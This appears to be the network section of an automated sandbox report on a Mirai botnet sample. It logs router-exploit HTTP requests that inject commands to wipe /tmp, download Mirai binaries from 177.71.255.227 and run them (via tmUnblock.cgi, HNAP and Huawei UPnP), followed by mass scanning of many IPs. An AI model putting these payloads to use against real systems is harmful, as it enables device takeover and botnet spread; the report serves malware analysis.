| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | TCP traffic: 192.168.2.23:50096 -> 105.108.98.128:7547 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 216.142.239.143:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 85.205.169.136:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 148.223.240.98:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 124.93.215.126:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 221.22.247.229:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 158.76.24.155:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 164.110.176.132:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 108.166.131.33:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 73.88.3.245:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 17.215.106.183:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 211.143.152.139:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 95.181.213.70:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 59.42.243.169:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 98.155.110.36:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 190.45.205.102:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:59360 -> 147.230.44.12:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.230.239.143:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.32.136.143:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.217.56.31:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.205.82.40:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.63.109.57:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.10.173.250:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.251.18.175:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.188.84.0:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.129.0.30:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.109.178.200:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.237.176.187:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.46.142.220:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.87.155.46:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.47.150.61:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.68.231.108:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.27.96.74:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.148.177.84:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.135.59.25:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.159.137.164:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.187.209.149:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.100.12.139:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.150.156.117:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.184.49.28:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.118.91.202:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.25.41.44:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.2.213.169:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.154.173.226:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.91.71.147:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.117.14.186:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.31.189.208:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.10.131.74:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.41.45.108:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.21.164.117:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.102.7.100:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.43.44.34:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.183.247.252:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.187.113.244:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.130.10.196:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.231.163.231:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.153.20.140:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.149.99.88:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.185.110.230:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.216.213.24:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.50.245.45:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.71.146.235:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.145.31.17:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.148.18.109:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.27.228.182:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.245.32.94:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.32.144.167:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.220.229.210:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.249.242.195:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.21.205.201:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.160.95.69:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.75.251.95:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.12.175.232:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.113.22.37:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.46.148.126:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.1.232.64:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.64.35.215:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.207.130.32:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.78.221.168:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.244.126.30:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.24.77.162:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.169.143.120:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.169.126.232:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.17.86.141:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.124.126.249:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.69.150.195:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.123.170.1:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.73.116.112:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.179.195.122:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.49.33.206:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.191.240.129:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.220.136.91:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.239.117.26:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.92.151.22:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.170.232.218:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.78.189.37:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.67.1.241:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.224.204.151:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.183.62.44:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.93.19.18:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.253.198.237:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.29.166.203:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.82.141.251:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.8.42.170:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.99.5.29:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.62.26.110:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.143.212.46:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.142.226.249:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.131.237.87:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.128.75.37:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.161.80.133:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.216.180.26:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.39.9.93:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.112.61.143:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.96.213.95:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.202.106.83:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.86.11.212:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.47.93.242:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.177.177.227:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.187.95.185:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.74.26.100:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.133.173.241:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.103.164.231:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.234.122.20:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.171.110.14:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.194.143.202:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.135.173.114:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.49.228.186:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.61.66.161:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.50.69.249:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.29.102.108:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.215.97.60:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.44.16.234:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.55.5.164:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.159.224.175:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.208.194.162:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.216.38.171:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.201.154.180:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.125.33.214:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.228.202.193:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.87.145.206:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.38.28.196:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.239.60.237:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.229.56.162:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.169.244.7:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.156.33.17:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.138.24.7:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.158.123.2:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.145.94.240:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.51.185.255:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.60.133.92:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.26.26.177:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.69.70.220:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.238.214.191:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.42.252.106:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.105.78.85:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.116.222.241:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.177.47.207:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.159.253.216:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.244.36.48:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.236.231.100:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.28.217.241:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.21.69.145:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.11.100.31:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.88.65.79:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.96.138.215:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.103.137.243:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.218.211.206:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.204.199.97:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.208.233.132:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.69.54.110:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.222.100.150:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.4.51.216:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.133.103.243:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.221.3.61:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.129.148.102:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.1.248.122:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.158.218.165:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.23.125.51:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.123.191.188:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.16.60.186:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.50.187.74:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.215.87.143:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.189.36.52:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.189.67.212:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.190.89.87:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.67.11.65:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.242.252.153:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.79.18.148:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.172.78.239:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.104.82.112:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.133.103.169:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.172.99.150:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.2.138.107:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.27.228.143:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.79.158.245:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.231.240.84:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.116.217.194:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.62.6.98:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.184.174.216:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.66.245.127:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.97.252.178:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.16.10.219:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.119.113.229:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.83.170.210:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.58.243.39:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.48.149.229:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.178.211.135:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.213.177.79:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.171.174.41:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.204.186.87:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.159.97.74:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.250.138.46:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.173.210.49:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.92.176.102:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.183.112.243:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.64.35.20:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 98.188.99.80:8080 |
| Source: global traffic | TCP traffic: 192.168.2.23:60128 -> 184.36.17.143:8080 |
